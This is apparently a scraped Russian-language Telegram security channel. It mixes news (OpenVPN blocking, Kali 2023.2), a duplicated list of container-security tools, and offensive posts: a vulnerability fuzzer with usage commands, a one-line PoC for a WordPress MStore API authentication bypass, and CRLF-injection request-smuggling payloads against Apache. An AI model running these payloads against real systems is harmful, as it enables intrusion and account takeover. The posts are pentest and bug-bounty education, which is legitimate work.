Hacker News
Российские провайдеры начали блокировать подключения OpenVPN https://xakep.ru/2023/05/31/openvpn-block/
Wireguard пока работает стабильно. Но возможно он на очереди на расстрел 🔫
Please open Telegram to view this post
VIEW IN TELEGRAM
Предлагайте свои идеи/технологии на замену заблокированных. Если соберём список, то сделаю ресерч на что и как лучше переходить.
🤣7❤1
Forwarded from Just Security
Туллинг для специалистов по безопасности контейнеров
В современной разработке контейнеризация радикально изменила способ, которым мы создаем, развертываем и управляем приложениями. Но с этой новой парадигмой приходит и критическая необходимость в безопасности контейнеров.
Вашему вниманию предлагается несколько категорий и инструментов, которые помогут поддержать уровень защищенности на приемлемом уровне (только free / opensource):
Container image scanning:
- Clair
- Trivy
- Anchore Engine
- Grype
Container orchestration:
- Kubernetes
- Apache Mesos
- Nomad
Runtime protection:
- Tracee
- Sysdig
- Falco
- KuberArmor
Configuration management:
- Ansible
- Chef
- Puppet
Vulnerability management:
- Greenbone
- DefectDojo
Container firewall:
- Calico
- Cilium
- Weave Net
Security information and event management (SIEM):
- ELK
- Wazuh
Identity and access management (IAM):
- Keycloak
- OpenIAM
Continuous integration and deployment (CI/CD):
- Jenkins
- GitLab CI/CD
- Travis CI
- GitHub Actions
- Bamboo
Incident response:
- TheHive
Kubernetes Security:
- Aqua Security
- Sysdig Secure
- Twistlock
В современной разработке контейнеризация радикально изменила способ, которым мы создаем, развертываем и управляем приложениями. Но с этой новой парадигмой приходит и критическая необходимость в безопасности контейнеров.
Вашему вниманию предлагается несколько категорий и инструментов, которые помогут поддержать уровень защищенности на приемлемом уровне (только free / opensource):
Container image scanning:
- Clair
- Trivy
- Anchore Engine
- Grype
Container orchestration:
- Kubernetes
- Apache Mesos
- Nomad
Runtime protection:
- Tracee
- Sysdig
- Falco
- KuberArmor
Configuration management:
- Ansible
- Chef
- Puppet
Vulnerability management:
- Greenbone
- DefectDojo
Container firewall:
- Calico
- Cilium
- Weave Net
Security information and event management (SIEM):
- ELK
- Wazuh
Identity and access management (IAM):
- Keycloak
- OpenIAM
Continuous integration and deployment (CI/CD):
- Jenkins
- GitLab CI/CD
- Travis CI
- GitHub Actions
- Bamboo
Incident response:
- TheHive
Kubernetes Security:
- Aqua Security
- Sysdig Secure
- Twistlock
🔴BountyIt
Fuzzer на golang для поиска уязвимостей типа xss, lfi, rce, ssti и т.д., который обнаруживает уязвимость по изменению длины содержимого и проверяет ее с помощью сигнатур.
Установка:
Fuzzer на golang для поиска уязвимостей типа xss, lfi, rce, ssti и т.д., который обнаруживает уязвимость по изменению длины содержимого и проверяет ее с помощью сигнатур.
Установка:
go install github.com/shivangx01b/BountyIt@latest
Синтаксис фаззинга:https://example.com/FUZZ
https://example.com/?query=FUZZ
Использование:echo "https://example.com/FUZZ" | BountyIt
cat http_https.txt | BountyIt -t 70 -p payloads.txt -verify
cat http_https.txt | BountyIt -t 70 -header "Cookie: session=311x1211sx4..." -p payloads.txt -grep signatures.txt
#tools #bugbounty❤4❤🔥2🆒1
Вышла Kali Linux 2023.2 с 13 новыми инструментами и образом HyperV
Компания Offensive Security представила Kali Linux 2023.2, вторую версию дистрибутива в 2023 году. Теперь Kali содержит готовый образ Hyper-V и тринадцать новых инструментов, включая фреймворк Evilginx для кражи учетных данных и cookie сеансов.
Одним из наиболее заметных обновлений в этом выпуске стал pre-built образ Hyper-V, настроенный для Enhanced Session Mode, что позволяет подключаться к виртуальной машине с помощью RDP. Новый образ Hyper-V уже можно загрузить с kali.org, после чего останется распаковать и запустить извлеченный скрипт install-vm.bat.
#kali_update
Компания Offensive Security представила Kali Linux 2023.2, вторую версию дистрибутива в 2023 году. Теперь Kali содержит готовый образ Hyper-V и тринадцать новых инструментов, включая фреймворк Evilginx для кражи учетных данных и cookie сеансов.
Одним из наиболее заметных обновлений в этом выпуске стал pre-built образ Hyper-V, настроенный для Enhanced Session Mode, что позволяет подключаться к виртуальной машине с помощью RDP. Новый образ Hyper-V уже можно загрузить с kali.org, после чего останется распаковать и запустить извлеченный скрипт install-vm.bat.
#kali_update
👍1
❤8🔥5👍2🐳1
Forwarded from Ralf Hacker Channel (Ralf Hacker)
Что тут у нас? Ой, очередное LPE😁
https://github.com/Dec0ne/DavRelayUp
#ad #redteam #pentest #lpe
https://github.com/Dec0ne/DavRelayUp
DavRelayUp - a universal no-fix LPE in domain-joined windows workstations where LDAP signing is not enforced (the default settings).
#ad #redteam #pentest #lpe
MStore API <= 3.9.2 - Authentication Bypass
CVE-2023-2732
Плагин MStore API для WordPress уязвим для обхода аутентификации в версиях до 3.9.2 включительно. Это связано с недостаточной проверкой пользователя во время REST API запроса на добавление объявлений через плагин. Это позволяет злоумышленникам, не прошедшим проверку подлинности, войти в систему под именем любого существующего на сайте пользователя, например администратора, если у них есть доступ к идентификатору пользователя.
PoC:
CVE-2023-2732
Плагин MStore API для WordPress уязвим для обхода аутентификации в версиях до 3.9.2 включительно. Это связано с недостаточной проверкой пользователя во время REST API запроса на добавление объявлений через плагин. Это позволяет злоумышленникам, не прошедшим проверку подлинности, войти в систему под именем любого существующего на сайте пользователя, например администратора, если у них есть доступ к идентификатору пользователя.
PoC:
git clone https://github.com/RandomRobbieBF/CVE-2023-2732 ; pip3 install -r requirements.txt ; python3 mstore-api.py -u http://TARGET#CVE #POC
🆒3
Forwarded from Monkey Hacker
Apache HTTP-Request-Smuggling (CVE-2023-25690)
Где-то в апреле была шумиха с новой вулной в Apache, когда
В первом случае был следующий прикол
Пользователь запрашивает URL
Весело, да?
Плюс, замечу, что Apache был уязвим еще к
Для его эксплуатации мы уже имеем следующиим запрос
И теперь делаем смагглинг запрос
И ответ будет следующий
Где-то в апреле была шумиха с новой вулной в Apache, когда
mod_proxy вместе с правилами RewriteRule и ProxyPassMatch, приводил к HTTP-Request-SmugglingВ первом случае был следующий прикол
Пользователь запрашивает URL
https://testik.com/categories/1, а RewriteRule сопоставляет URL и захватывает значение 1 с помощью регулярного выражения ^/categories/(.*). Затем правило переписывает URL на http://testik.com:8080/categories?id=1, добавляя перехваченное значение к переписанному URL в качестве id параметра запроса.ProxyPassReverse, уже просто заменяет домен и адрес внутреннего сервера на домен и адрес прокси-сервера, чтобы клиент мог правильно переходить по ссылкам и получать доступ к контенту с проксированного внутреннего сервера /categories/ http://example-shop.com:8080/. Плюс, замечу, что Apache был уязвим еще к
CRLF-injection, который нам будет нужен в дальнейшемДля его эксплуатации мы уже имеем следующиим запрос
GET /categories/1%20HTTP/1.1%0d%0aFoo:%20baarr HTTP/1.1
Host: localhostИ теперь делаем смагглинг запрос
GET /categories/1%20HTTP/1.1%0d%0aHost:%20localhost%0d%0a%0d%0aGET%20/SMUGGLED HTTP/1.1
Host: localhostИ ответ будет следующий
GET /categories.php?id=1 HTTP/1.1
Host: localhost
GET /SMUGGLED HTTP/1.1
Host: backendGitHub
GitHub - dhmosfunk/CVE-2023-25690-POC: CVE 2023 25690 Proof of concept - mod_proxy vulnerable configuration on Apache HTTP Server…
CVE 2023 25690 Proof of concept - mod_proxy vulnerable configuration on Apache HTTP Server versions 2.4.0 - 2.4.55 leads to HTTP Request Smuggling vulnerability. - dhmosfunk/CVE-2023-25690-POC
PortSwigger Labs ERR_TIMED_OUT in Burp Suite browser
Если вы сталкивались с проблемой, когда лабы с PortSwigger не открываются в браузере BurpSuite. То вот решение:
1. Открываем браузер и переходим на
3. Нажимаем Relaunch
4. Готово! Продуктивного похека 😎
5. Делимся этой шпорой
#полезное
Если вы сталкивались с проблемой, когда лабы с PortSwigger не открываются в браузере BurpSuite. То вот решение:
1. Открываем браузер и переходим на
chrome://flags
2. Далее в поиске пишем Encrypted ClientHello и ставим значение Disabled3. Нажимаем Relaunch
4. Готово! Продуктивного похека 😎
❤5